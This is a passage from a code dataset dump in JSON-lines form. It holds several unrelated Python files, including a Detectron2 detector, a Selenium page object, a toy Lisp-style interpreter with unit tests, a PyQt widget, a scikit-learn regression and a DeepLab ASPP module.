gen_len <= 10:\n for c in candidates:\n seq, score = c[0], c[1]\n _target = Variable(torch.LongTensor([seq]), requires_grad=False)\n dec_o = self.do_decode(1, len(seq), ses_encoding, _target)\n op = dec_o[:, -1, :]\n for i in range(op.size(1)):\n n_candidates.append((seq + [i], score + op.data[0, i]))\n # hack to exponent sequence length by alpha-0.7\n n_candidates.sort(key=lambda temp: temp[1] / (1.0*len(temp[0])**0.7), reverse=True)\n candidates = copy.copy(n_candidates[:beam])\n n_candidates[:] = []\n gen_len += 1\n\n return candidates\n else:\n if use_cuda:\n x = x.cuda()\n siz, seq_len = x.size(0), x.size(1)\n ses_encoding = ses_encoding.view(self.num_lyr*self.direction, siz, self.hid_size)\n dec_o = self.do_decode(siz, seq_len, ses_encoding, x if self.teacher_forcing else None)\n return dec_o\n\n def set_teacher_forcing(self, val):\n self.teacher_forcing = val\n","sub_path":"modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"29103699","text":"from detectron2.engine import DefaultPredictor\r\nfrom detectron2.config import get_cfg\r\nfrom detectron2.data import MetadataCatalog\r\nfrom detectron2.utils.visualizer import ColorMode,Visualizer\r\nfrom detectron2 import model_zoo\r\n\r\n\r\nimport cv2\r\nimport numpy\r\n\r\n\r\nclass Detector:\r\n def __init__(self,model_type = \"OD\"):\r\n self.cfg = get_cfg()\r\n self.model_type = model_type\r\n\r\n #Load model and pretrained model\r\n if model_type == \"OD\":\r\n #Object detection\r\n\r\n self.cfg.merge_from_file(model_zoo.get_config_file(\"COCO-Detection/faster_rcnn_R_101_FPN_3x.yaml\"))\r\n self.cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(\"COCO-Detection/faster_rcnn_R_101_FPN_3x.yaml\")\r\n\r\n elif model_type == \"IS\": # Instance segmentation\r\n self.cfg.merge_from_file(model_zoo.get_config_file(\"COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml\"))\r\n self.cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(\"COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml\")\r\n\r\n elif model_type == \"PS\" : #Panoptic segmentation\r\n\r\n self.cfg.merge_from_file(model_zoo.get_config_file(\"COCO-PanopticSegmentation/panoptic_fpn_R_101_3x.yaml\"))\r\n self.cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(\"COCO-PanopticSegmentation/panoptic_fpn_R_101_3x.yaml\")\r\n\r\n\r\n\r\n\r\n self.cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.7\r\n self.cfg.MODEL.DEVICE = 'cpu'\r\n\r\n self.predictor = DefaultPredictor(self.cfg)\r\n\r\n def onImage(self,imagePath):\r\n image = cv2.imread(imagePath)\r\n if self.model_type != \"PS\":\r\n\r\n prediction = self.predictor(image)\r\n\r\n viz = Visualizer(image[:,:,::-1],metadata=MetadataCatalog.get(self.cfg.DATASETS.TRAIN[0]),\r\n instance_mode= ColorMode.IMAGE)\r\n output = viz.draw_instance_predictions(prediction[\"instances\"].to(\"cpu\"))\r\n\r\n else :\r\n prediction,segmentInfo = self.predictor(image)[\"panoptic_seg\"]\r\n viz = Visualizer(image[:,:,::-1],MetadataCatalog.get(self.cfg.DATASETS.TRAIN[0]))\r\n output = viz.draw_panoptic_seg_predictions(prediction.to(\"cpu\"),segmentInfo)\r\n cv2.imshow(\"Result\",output.get_image()[:,:,::-1])\r\n cv2.waitKey(0)\r\n\r\n\r\n def onVideo(self,videopath):\r\n cap = cv2.VideoCapture(videopath)\r\n\r\n if (cap.isOpened()==False):\r\n print(\"Error opening the file..\")\r\n return\r\n (sucess, image ) = cap.read()\r\n\r\n while sucess :\r\n if self.model_type != \"PS\":\r\n\r\n prediction = self.predictor(image)\r\n\r\n viz = Visualizer(image[:, :, ::-1], metadata=MetadataCatalog.get(self.cfg.DATASETS.TRAIN[0]),\r\n instance_mode=ColorMode.IMAGE)\r\n output = viz.draw_instance_predictions(prediction[\"instances\"].to(\"cpu\"))\r\n\r\n else:\r\n prediction, segmentInfo = self.predictor(image)[\"panoptic_seg\"]\r\n viz = Visualizer(image[:, :, ::-1], MetadataCatalog.get(self.cfg.DATASETS.TRAIN[0]))\r\n output = viz.draw_panoptic_seg_predictions(prediction.to(\"cpu\"), segmentInfo)\r\n cv2.imshow(\"Result\", output.get_image()[:, :, ::-1])\r\n\r\n key = cv2.waitKey(1) & 0xFF\r\n if key == ord(\"q\"):\r\n break\r\n (sucess,image) = cap.read()\r\n\r\n\r\n","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"159787845","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*-\nfrom time import sleep\n\nfrom common.basePage import BasePage\n\n\nclass GroupPage(BasePage):\n # 活动中心\n # 运营\n activity_button = ('xpath', '//*[@id=\"menu\"]/div/ul/li[13]/div')\n user_click = ('xpath', '//*[@id=\"menu\"]/div/ul/li[13]/ul/li[1]')\n\n # 用户群组_新增\n add_button = ('xpath', '//*[@id=\"home\"]/div[3]/div/div/div[1]/div[2]/div[2]/button')\n group_name_input = ('xpath', '//*[@id=\"userGroupDetail-warp\"]/div/div/div[2]/div[1]/input')\n condition_1_click = ('xpath', '//*[@id=\"userGroupDetail-warp\"]/div/div/div[2]/div[4]/div[2]/span[2]')\n condition_2_click = ('xpath', '//*[@id=\"userGroupDetail-warp\"]/div/div/div[2]/div[4]/div[3]/span[3]')\n condition_3_click = ('xpath', '//*[@id=\"userGroupDetail-warp\"]/div/div/div[2]/div[4]/div[4]/span[2]')\n int_input = ('xpath', '//*[@id=\"userGroupDetail-warp\"]/div/div/div[2]/div[5]/div/div[3]/div/input')\n save_button = ('xpath', '//*[@id=\"home\"]/div[3]/div/div/div[2]/div/button[2]/span')\n save_true_button = ('xpath', '/html/body/div[2]/div/div[3]/button[2]/span')\n\n # 用户群组_编辑\n edit_click = (\n 'xpath', '//*[@id=\"home\"]/div[3]/div/div/div[2]/div/div[3]/table/tbody/tr[1]/td[8]/div/button[1]/span')\n clear_button = ('xpath', '//*[@id=\"userGroupDetail-warp\"]/div/div/div[2]/div[5]/h3/a')\n\n # 用户群组_删除\n delete_click = (\n 'xpath', '//*[@id=\"home\"]/div[3]/div/div/div[2]/div/div[3]/table/tbody/tr[1]/td[8]/div/button[2]/span')\n\n # 校验的提示框\n check = ('class name', 'el-message__group')\n\n def add_group(self,group_name,number):\n # self.click(self.user_click)\n self.click(self.add_button)\n sleep(0.5)\n self.sendKeys(self.group_name_input, text=group_name)\n self.click(self.condition_1_click)\n self.click(self.condition_2_click)\n self.click(self.condition_3_click)\n self.sendKeys(self.int_input, text=number)\n self.click(self.save_button)\n sleep(0.5)\n\n def edit_group(self, group_name,number):\n self.click(self.edit_click)\n sleep(0.5)\n self.clear(self.group_name_input)\n self.sendKeys(self.group_name_input, text=group_name)\n self.click(self.clear_button)\n self.click(self.condition_1_click)\n self.click(self.condition_2_click)\n self.click(self.condition_3_click)\n self.sendKeys(self.int_input, text=number)\n self.click(self.save_button)\n sleep(0.5)\n\n def delete_group(self):\n self.click(self.delete_click)\n self.click(self.save_true_button)\n sleep(1)\n","sub_path":"pages/crm/user_groupPage.py","file_name":"user_groupPage.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"267527159","text":"# -*- coding: UTF-8 -*-\n# http://www.pythontutor.com/\n# python.exe -m doctest stackFrame.py # stackFrame.py is argv to doctest.script\n# from __future__ import print_function\nimport argparse\n\nimport re\nimport functools\nPREFIX = ''\ndef trace(fn):\n \"\"\"A decorator that prints a function's name, its arguments, and its return\n values each time the function is called. For example,\n\n @trace\n def compute_something(x, y):\n # function body\n \"\"\"\n @functools.wraps(fn)\n def wrapped(*args, **kwds):\n global PREFIX\n reprs = [repr(e) for e in args] \n reprs += [repr(k) + '=' + repr(v) for k, v in kwds.items()]\n log('{0}({1})'.format(fn.__name__, ', '.join(reprs)) + ':')\n PREFIX += ' '\n try:\n result = fn(*args, **kwds)\n PREFIX = PREFIX[:-4]\n except Exception as e:\n log(fn.__name__ + ' exited via exception')\n PREFIX = PREFIX[:-4]\n raise\n # Here, print out the return value.\n #log('{0}({1}) -> {2}'.format(fn.__name__, ', '.join(reprs), result))\n log('-> {0}'.format(result,))\n return result\n return wrapped\n \ndef log(message):\n \"\"\"Print an indented message (used with trace).\"\"\"\n if type(message) is not str:\n message = str(message)\n print(PREFIX + re.sub('\\n', '\\n' + PREFIX, message))\n\nisa = isinstance\n \ndef tokenize(s):\n '''\n \"Convert a string into a list of tokens.\"\n \n >>> tokenize('(+(* 3 4)5)') #必须有空格在>>> 后面 下面必须严格对齐第一个>\n ['(', '+', '(', '*', '3', '4', ')', '5', ')']\n '''\n return s.replace('(',' ( ').replace(')',' ) ').split()\n\ndef atom(token):\n\t\"Numbers become numbers; every other token is a symbol.\"\n\ttry: return int(token)\n\texcept ValueError:\n\t\ttry: return float(token)\n\t\texcept ValueError:\n\t\t\tif '/' in token:\n\t\t\t\tnum,deno = token.split('/')\n\t\t\t\treturn Fraction(num,deno)\n\t\t\telif 'i' in token and '+' in token:\n##\t\t\t\ttemp = eval(token.replace('i', 'j', 1))#try: return complex(token.replace('i', 'j', 1))\n\t\t\t\ttemp = token.replace('i', 'j', 1)\n\t\t\t\treal,image = token.split('+')\n\t\t\t\ttemp = MComplex(real,image[:-1])\n\t\t\t\tif isa(temp,MComplex): # isa and type return SAME for primitive type including complex\n\t\t\t\t\treturn temp\n\t\t\t\telse:\n\t\t\t\t\treturn str(token)\n\t\t\telse:\n\t\t\t\treturn (Variable(token) )\n \ndef printTreeIndented(tree, level=0):\n if tree == None: return\n printTreeIndented(tree.right, level+1)\n print (' '*level + str(tree.cargo))\n printTreeIndented(tree.left, level+1)\n \ndef CreateTree(code):\n print (code.replace('(',' ( ').replace(')',' ) '))\n tokens = tokenize(code)\n print (tokens)\n ast = reCreateTree(tokens)\n #printTreeIndented(ast)\n return ast\n@trace\ndef reCreateTree(tokens):\n if len(tokens) == 0:\n raise SyntaxError('unexpected EOF while reading')\n result = None\n token = tokens.pop(0)\n if '(' == token:\n op= tokens.pop(0)\n result = Add() if op == '+' else ( Multiply(op) if op == '*' else \\\n LessThan() if op == '<' else \\\n If() if op == 'if' else \\\n While() if op == 'while' else Tree(op))\n \n if isa(result,If):\n result.condition = reCreateTree(tokens)\n result.consequence = reCreateTree(tokens)\n result.alternative = reCreateTree(tokens)\n elif isa(result,While):\n result.condition = reCreateTree(tokens)\n result.body = reCreateTree(tokens) \n \n else:\n if '(' == tokens[0]:\n result.left = reCreateTree(tokens)\n else:\n result.left = Tree(atom(tokens.pop(0)))\n if '(' == tokens[0]:\n result.right = reCreateTree(tokens)\n else:\n result.right = Tree(atom(tokens.pop(0)))\n if ')' != tokens.pop(0) :\n raise SyntaxError('unexpected )')\n return result\n\ndef GeneraTree(neList):\n result = Tree(neList[0] )\n if isa(neList[1], str) or isa(neList[1], int) or isa(neList[1], MComplex) or isa(neList[1], Fraction):\n result.left = (Tree( neList[1]))\n else:\n result.left= GeneraTree(neList[1])\n if isa(neList[2], str)or isa(neList[2], int) or isa(neList[2], MComplex) or isa(neList[2], Fraction):\n result.right = (Tree( neList[2]))\n else:\n result.right= GeneraTree(neList[2])\n return result \n \nclass CommonEqualityMixin(object):\n\n def __eq__(self, other):\n return (isinstance(other, self.__class__)\n and self.__dict__ == other.__dict__)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n \nclass Fraction(object):# if no object, type() will return - > , AND type(Fraction) WILL be \n# while if there is object, type(Fraction) BE \n def __init__(self, num, den=1):\n self.num = int(num)\n self.den = int(den)\n def __str__(self):\n return \"%d///%d\" % (self.num, self.den)\n\n def __repr__(self):\n return \"%d//%d\" % (self.num, self.den)\n \n def __mul__(self, object):#很危险,LEGB\n return Fraction(self.num*object.num, self.den*object.den)\n #__rmul__ = __mul__\n def __add__(self, other):\n if type(other) == type(5):\n other = Fraction(other)\n return Fraction(self.num * other.den +\\\nself.den * other.num,\\\nself.den * other.den)\n __radd__ = __add__\n \n def __sub__(self,other):\n if isinstance(other,type(5)): #这个other写成object会出错,因为object可以找到LEGB,但是if永远是False\n other = Fraction(other)\n return Fraction(self.num * other.den - self.den * other.num,self.den * other.den)\n \n# how to write a logic line in multi phsical lines\n\n# how to use semi comma to with multi ligic line in a phsical line\n##a = Fraction(1,3);b = Fraction(1,2);print a + b \n\n\nclass MComplex(object): #\n\tdef __init__(self,real,imag=0):\n\t\tself.real = float(real)\n\t\tself.imag = float(imag)\n\tdef __repr__(self):\n\t\treturn \"MComplex(%s,%s)\" % (self.real, self.imag)\n\tdef __str__(self):\n\t\treturn \"(%g+%gi)\" % (self.real, self.imag)\n\t# self + other\n\tdef __add__(self,other):\n\t\treturn MComplex(self.real + other.real, self.imag + other.imag)\n# self - other\n\tdef __sub__(self,other):\n\t\treturn MComplex(self.real - other.real, self.imag - other.imag)\n\t#def __mul__(self, object):\n\t#\traise\n \nclass Tree(CommonEqualityMixin):\n def __init__(self, cargo, left=None, right=None):\n self.cargo = cargo\n self.left = left\n self.right = right\n\n def __str__(self):\n #return '<%s>' % (str(self.cargo),)\n #return '{0}: {1}'.format(self.__class__,str(self.cargo),)\n return ' ( {0} {1} {2} ) '.format(str(self.cargo)*3,repr(self.left),repr(self.right),) if self.left is not None else str(self.cargo) \n def __repr__(self):\n return ' ( {0} {1} {2} ) '.format(str(self.cargo)*2,repr(self.left),repr(self.right),) if self.left is not None else str(self.cargo)\n @trace \n def eval(self,env):#如果你是Tree(1)它刚好返回python的1这个int东东。但是如果是Boolean就会出错了\n return self.cargo if not ( isa(self.cargo, Variable)) else self.cargo.eval(env)\n \nclass Add(Tree):\n \"\"\" 加法符号类\n \"\"\"\n def __init__(self, left=None, right=None):\n super().__init__(left = left,right = right,cargo = '+')\n \n @trace \n def eval(self,env):\n return self.left.eval(env) + self.right.eval(env) #Number.new(left.evaluate(environment).value + right.evaluate(environment).value)\n\n \n\n \nclass Let(Tree):\n \"\"\" 加法符号类\n \"\"\"\n def __init__(self, left=None, right=None):\n super().__init__(left = left,right = right,cargo = 'let')\n @trace \n def eval(self,env):\n if left not in env:\n env[left] = right.eval(env) \n else: raise \n \nclass Set(Tree):\n \"\"\" 加法符号类\n \"\"\"\n def __init__(self, left=None, right=None):\n super().__init__(left = left,right = right,cargo = 'let')\n \n @trace \n def eval(self,env):\n if left in env:\n env[left] = right.eval(env) \n else: raise \n \nclass Machine(object):\n \"\"\" 虚拟机\n \"\"\"\n def __init__(self, environment):\n self.env = environment\n \n def RunCode(self, code):\n result = code.eval(self.env)\n print(result); import pprint; pprint(self.env)\n return result\n \nclass Multiply(Tree):\n \"\"\" 乘法符号类\n \"\"\"\n def __init__(self, left=None, right=None):\n super().__init__('*', left, right) \n\nclass Boolean(CommonEqualityMixin):\n \"\"\" 布尔值符号类型\n \"\"\"\n def __init__(self, value):\n self.value = value\n\n def __repr__(self):\n return 'true' if self.value else 'false'\n\n def __str__(self):\n return str(self.value)\n \n def __add__(self,other):\n return Boolean(self.value or other.value )\n\nclass Variable(object):\n \"\"\" 变量符号类\n \"\"\"\n def __init__(self, name):\n self.name = name\n \n @trace\n def eval(self,env):\n print(self.name)\n print('var called env')\n return env[self.name] \n \nclass If(object):\n \"\"\" IF控制语句的实现\n \"\"\"\n def __init__(self, condition=None, consequence=None, alternative=None):\n self.condition = condition\n self.consequence = consequence\n self.alternative = alternative \n\n @trace\n def eval(self,env):\n cond = self.condition.eval(env); print (cond)\n if cond == Boolean(True):\n return self.consequence.eval(env)\n elif cond == Boolean(False):\n return self.alternative.eval(env)\n \n def __repr__(self):\n return '( if {0} {1} {2} )'.format(repr(self.condition),repr(self.consequence),repr(self.alternative),)\n\n def __str__(self):\n return 'if statement' \n \nclass While(object):\n def __init__(self, condition=None, body=None):\n self.condition = condition\n self.body = body\n\n def eval(self,env):\n if self.condition.eval(env).value == Boolean(True).value:\n return self.eval(env)\n elif self.condition.eval(env).value == Boolean(False).value:\n return \n \n def __repr__(self):\n return '( while {0} {1} )'.format(repr(self.condition),repr(self.body),)\n\n def __str__(self):\n return 'while statement' \n \n \nclass LessThan(Tree):\n \"\"\" 小于符号类\n \"\"\"\n def __init__(self, left=None, right=None):\n super().__init__(left = left,right = right,cargo = '<') \n @trace\n def eval(self,env):\n return Boolean(self.left.eval(env) < self.right.eval(env))#Number.new(left.evaluate(environment).value + right.evaluate(environment).value)\n \n@trace\ndef evalTree(t):\n if t.cargo == '+':\n return evalTree(t.left) + evalTree(t.right)\n elif t.cargo == '*':\n return evalTree(t.left) * evalTree(t.right)\n elif t.cargo == '-':\n return evalTree(t.left) - evalTree(t.right) \n else:\n return t.cargo\n \n\n\n## UnitTest\nimport unittest\nglobal_env = {}\nclass TestCName(unittest.TestCase):\n def setUp(self):\n # Perform set up actions (if any)\n #print('\\nsetUp called')\n pass\n def tearDown(self):\n # Perform clean-up actions (if any)\n #print('tearDown', 'called')\n pass\n \n def testLessThanAsCondFalse(self):\n #print('testLessThanAsCondFalse', 'called')\n self.assertEqual(CreateTree(' ( if (< 3 2 ) (+ 1 2 ) (+ 3 4))').eval(global_env), 7)\n def testLessThanAsCondTrue(self):\n self.assertEqual(CreateTree(' ( if (< 1 2 ) (+ 1 2 ) (+ 3 4))').eval(global_env), 3)\n def testLessThanAsCondTrueV(self):\n self.assertEqual(CreateTree(' ( if (< 1 2 ) (+ a 2 ) (+ 3 4))').eval({'a':3}), 5) \n def testLessThanAsValue(self):#下面可以过,但是true其实没有被测试 < 1 2\n self.assertEqual( CreateTree(' ( if (< 1 2 ) (+ (< 3 2) (< 3 1))(+ 1 2))') .eval(global_env), Boolean(False)) \n\n \n# python.exe -m doctest diGuiXiaJian.py \ndef _test():\n import doctest\n doctest.testmod()\n\n##################### \n# CreateTree('(* 5 (+ 1 2 ))')\n\nCreateTree(' (+ a 2 )') .eval({'a':1})\n\n#############################################\nif __name__ == \"__main__\":\n unittest.main()\n#following won't be called \nCreateTree('(* 5 (+ 1 2 ))')\nCreateTree('(3 5 (4 1 2 ))')\nCreateTree('( +( * 5 1) 2 )')\nTree('+', Tree(1),Tree(2)) == Tree('+', Tree(1),Tree(2))\nTree('*',Tree(5), Tree('+',Tree(1),Tree(2)))\nTree('*', Tree('+',Tree(1),Tree(2)),Tree(5))\nCreateTree('(* 5 (+ 1 2 ))') == Tree('*', Tree('+',Tree(1),Tree(2)),Tree(5))\n\nCreateTree('(* 5 (+ 1 2 ))') == Tree('*',Tree(5), Tree('+',Tree(1),Tree(2)))#true\nCreateTree('(* 5 (+ 1 2 ))') == Tree('*',Tree(5), Add(Tree(1),Tree(2)))#true\nCreateTree('(* 5 (+ 1 2 ))') == Multiply(Tree(5), Add(Tree(1),Tree(2)))#true\n\nCreateTree('( * ( + 7 ( * ( * 4 6) ( + 8 9 ) ) ) 5 )') \nCreateTree('(* 5 (+ 1 2 ))')\n\nevalTree( CreateTree('( * ( + 7 ( * ( * 4 6) ( + 8 9 ) ) ) 5 )') )\nevalTree( CreateTree('(* 5 (+ 1 2 ))') )\nevalTree( Tree('*',Tree(5), Tree('+',Tree(1),Tree(2))) )\nevalTree( Multiply(Tree(5), Add(Tree(1),Tree(2))) )\n\nCreateTree(' (* 3 2 )').eval(env)\n\n\n#下面2个输出是不一样的,因为我没有实现乘法的eval它去调用父类的eval。@trace的输出也不一样,因为入口参数用的repr而->后面是__str__\nCreateTree('(* 5 (* 3 2 ))').eval(env)\nCreateTree('(+ 7(+ 3 2 ))').eval(env)\nCreateTree('(+ 7(+ 6/3 2 ))').eval(env)#外围的+需要radd\nCreateTree('(- 18/3 2)').eval(env)\nCreateTree('(* 5 (+ 1 2 ))').eval(env) #这个根本就不下降,在入口就没有向下call\nCreateTree('(+ 5 (* 1 2 ))').eval(env) #看这个有意思,理解递归下降:先完成*.然后递归开始回升,出错\nevalTree(CreateTree('(- 18/3 2)') ) #这个可以求值\nCreateTree(' (+ 1 2 )').eval(env)# 如果你不print它,它虽然有值,但是��显示,不out而是被丢弃。除非你在脚本里面print它或者在ipython里面敲入它\n\nLessThan(Tree(1),Tree(2)).eval(env)\n\nLessThan(1,2).eval(env)\nLessThan(Tree(1),Tree(2)).eval(env)\nIf(LessThan(Tree(3),Tree(2)),Add(Tree(1),Tree(2)),Add(Tree(3),Tree(4))) .eval(env)\nIf(LessThan(Tree(1),Tree(2)),Add(Tree(1),Tree(2)),Add(Tree(3),Tree(4))) .eval(env)\nWhile(LessThan(Tree(1),Tree(2)),Add(Tree(1),Tree(2))).eval(env)\nCreateTree(' ( if (< 3 2 ) (+ 1 2 ) (+ 3 4))').eval(env)\nCreateTree(' ( if (< 1 2 ) 2 (+ 3 4))').eval(env)#这种不带括号的还不行,无法分词\nCreateTree(' (< 3 2 )').eval(env)\nCreateTree(' (< 1 2 )').eval(env)\nCreateTree(' (while ( < 1 2 ) ( + 1 2 ) ) ')\n# %run diGuiXiaJian.py\n# (* 5 (+ 1 2 ))\n# ( +( * 5 1) 2 )\n# 5 9 8 + 4 6 * * 7 + *\n# ( * ( + 7 ( * ( * 4 6) ( + 8 9 ) ) ) 5 )\n#EvalArray(Tree('*', Tree('+',Tree(1),Tree(2)),Tree(5)))\n ","sub_path":"diGuiXiaJian - Copy (2).py","file_name":"diGuiXiaJian - Copy (2).py","file_ext":"py","file_size_in_byte":15175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"336746915","text":"import os\nfrom os import listdir\nfrom os.path import isfile, join\n\nwriteFileName = 'trainval.txt'\nwriteFile = open(writeFileName, 'w')\nappended_filenames = [];\ntrainFileName = 'train.txt';\nvalFileName = 'val.txt';\ntrainFile = open(trainFileName, 'r').readlines();\nvalFile = open(valFileName, 'r').readlines();\n\t\t\nfor line in trainFile:\t\t\n\timageFileName = line.split()[0] + '\\n';\n\t#print(imageFileName);\t\t\n\tif imageFileName not in appended_filenames:\t\t\n\t\twriteFile.write(imageFileName);\t\n\t\tappended_filenames.append(imageFileName);\nfor line in valFile:\t\t\n\timageFileName = line.split()[0] + '\\n';\n\t#print(imageFileName);\t\t\n\tif imageFileName not in appended_filenames:\t\t\n\t\twriteFile.write(imageFileName);\t\n\t\tappended_filenames.append(imageFileName);\n\n\n\n\t\n\n\n","sub_path":"tools/TrainValParsers/IndividualParsers/writeTrainvalFiles.py","file_name":"writeTrainvalFiles.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"115668742","text":"from library import Library\nfrom PyQt5.QtWidgets import QWidget, QLabel, QPushButton, QLineEdit, QVBoxLayout\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QFont\n\n\n\nclass DeleteBook(QWidget):\n\n def __init__(self,parent=None):\n\n super(DeleteBook,self).__init__(parent)\n self.library = Library()\n self.init_ui()\n\n #Initialize the user interface\n def init_ui(self):\n\n self.textField = QLabel(\"Book Name\")\n self.textField.setAlignment(Qt.AlignCenter)\n self.textField.setFont(QFont('Arial',25))\n self.book = QLineEdit()\n self.delete = QPushButton(\"Delete\")\n self.back = QPushButton(\"Back to Menu\")\n\n v_box = QVBoxLayout()\n v_box.addStretch()\n v_box.addWidget(self.textField)\n v_box.addWidget(self.book)\n v_box.addWidget(self.delete)\n v_box.addWidget(self.back)\n v_box.addStretch()\n\n self.setLayout(v_box)\n self.delete.clicked.connect(self.delete_book)\n self.setWindowTitle(\"Delete\")\n\n def delete_book(self):\n book = self.book.text()\n self.library.delete_book(name=book) \n self.book.clear()\n","sub_path":"LibraryProject/Scripts/deleteBook.py","file_name":"deleteBook.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"4425441","text":"from sklearn import linear_model\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn import linear_model\r\nfrom sklearn.cross_validation import train_test_split\r\nnewdata=np.genfromtxt('abalone.data.txt',delimiter=',',dtype=\"|S5\")\r\nfor i in range(0,4177):\r\n if newdata[i,0]=='M':\r\n newdata[i,0]=1\r\n elif newdata[i,0]=='F':\r\n newdata[i,0]=-1\r\n else:\r\n newdata[i,0]=0\r\ny=newdata[:,-1]\r\nx=newdata[:,1:9]\r\nX_train, X_test, y_train, y_test = train_test_split(x, y, random_state=0)\r\nclf=linear_model.LinearRegression()\r\nX_train= np.array(X_train, dtype = 'float_')\r\nX_test= np.array(X_test, dtype = 'float_')\r\ny_train= np.array(y_train, dtype = 'float_')\r\ny_test= np.array(y_test, dtype = 'float_')\r\nclf.fit(X_train,y_train)\r\ny_pred=clf.predict(X_test)\r\n\r\nprint('Coefficients: \\n', clf.coef_)\r\n# The mean square error\r\nprint(\"Residual sum of squares: %.2f\"\r\n % np.mean((clf.predict(X_test) - y_test) ** 2))\r\n# Explained variance score: 1 is perfect prediction\r\nprint('Variance score: %.2f' % clf.score(X_test, y_test))\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"621938298","text":"import math\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.utils.model_zoo as model_zoo\nfrom torch.autograd import Variable, Function\nfrom torch.nn.parameter import Parameter\nimport torch.nn.functional as F\nfrom sync_batchnorm.batchnorm import SynchronizedBatchNorm2d\n\naffine_par = True\n\nclass _ASPPModule(nn.Module):\n def __init__(self, inplanes, planes, kernel_size, padding, dilation, BatchNorm):\n super(_ASPPModule, self).__init__()\n self.atrous_conv = nn.Conv2d(inplanes, planes, kernel_size=kernel_size,\n stride=1, padding=padding, dilation=dilation, bias=False)\n self.bn = BatchNorm(planes)\n self.relu = nn.ReLU()\n\n self._init_weight()\n\n def forward(self, x):\n x = self.atrous_conv(x)\n x = self.bn(x)\n\n return self.relu(x)\n\n def _init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n torch.nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, SynchronizedBatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\nclass ASPP(nn.Module):\n def __init__(self, inplanes, dilations, BatchNorm, num_classes):\n super(ASPP, self).__init__()\n\n self.aspp1 = _ASPPModule(inplanes, num_classes, 1, padding=0, dilation=dilations[0], BatchNorm=BatchNorm)\n self.aspp2 = _ASPPModule(inplanes, num_classes, 3, padding=dilations[1], dilation=dilations[1], BatchNorm=BatchNorm)\n self.aspp3 = _ASPPModule(inplanes, num_classes, 3, padding=dilations[2], dilation=dilations[2], BatchNorm=BatchNorm)\n self.aspp4 = _ASPPModule(inplanes, num_classes, 3, padding=dilations[3], dilation=dilations[3], BatchNorm=BatchNorm)\n\n self.global_avg_pool = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)),\n nn.Conv2d(inplanes, num_classes, 1, stride=1, bias=False),\n BatchNorm(num_classes),\n nn.ReLU())\n self.conv1 = nn.Conv2d(5*num_classes, num_classes, 1, bias=False)\n self.bn1 = BatchNorm(num_classes)\n self.relu = nn.ReLU()\n self.dropout = nn.Dropout(0.5)\n self._init_weight()\n\n def forward(self, x):\n x1 = self.aspp1(x)\n x2 = self.aspp2(x)\n x3 = self.aspp3(x)\n x4 = self.aspp4(x)\n x5 = self.global_avg_pool(x)\n x5 = F.interpolate(x5, size=x4.size()[2:], mode='bilinear', align_corners=True)\n x = torch.cat((x1, x2, x3, x4, x5), dim=1)\n\n x = self.conv1(x)\n x = self.bn1(x)\n #x = self.relu(x)\n\n #return self.dropout(x)\n return x\n\n def _init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n # n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n # m.weight.data.normal_(0, math.sqrt(2. / n))\n torch.nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, SynchronizedBatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n\ndef conv3x3(in_planes, out_planes, stride=1, padding=1, dilation=1):\n \"3x3 convolution with padding\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=padding, dilation=dilation, bias=False)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n def __init__(self, inplanes, planes, stride=1, dilation=1, downsample=None, BatchNorm=nn.BatchNorm2d):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride=stride)\n self.bn1 = BatchNorm(planes, affine = affine_par)\n self.relu = nn.ReLU(inplace=True)\n\n padding = dilation\n self.conv2 = conv3x3(planes, planes, stride=1, padding=padding, dilation = dilation)\n self.bn2 = BatchNorm(planes, affine = affine_par)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n out += residual\n out = self.relu(out)\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n def __init__(self, inplanes, planes, stride=1, dilation=1, 